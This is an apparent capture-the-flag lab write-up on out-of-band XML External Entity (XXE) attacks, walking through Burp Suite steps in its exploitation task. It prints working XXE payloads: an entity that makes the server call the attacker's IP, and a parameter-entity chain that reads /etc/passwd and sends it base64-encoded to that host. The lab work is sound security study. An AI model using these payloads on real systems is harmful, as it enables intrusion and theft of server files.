OOB XXE

March 20, 2024

Task 1: XML Introduction

Task 2: XML External Entity (XXE) Introduction

Task 3: Deploying the machine

Task 4: Assessing the Target Web Application

Task 5: Exploiting OOB XXE

First we have to send the POST request of the website to Repeater section of BURP

Then we will modified the legitimate request to test a ssrf vulnerability in the website.

Change the <name> paramater from kyou to &ssrf; which we need to call the variable to execute the command.

<!DOCTYPE response [
<!ENTITY ssrf SYSTEM "http://10.9.193.229:8000">
]>

&ssrf;

We can see that the server actually reached our python server

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'http://10.9.193.229:8000/?data=%file;'>">
%xxe;

<!DOCTYPE response SYSTEM "http://10.9.193.229:8000/oob-xxe.dtd">

&exfil;

Task 6: Impact, Mitigation, Tools, and References

PreviousBounty Hacker NextHackPark

Last updated 1 year ago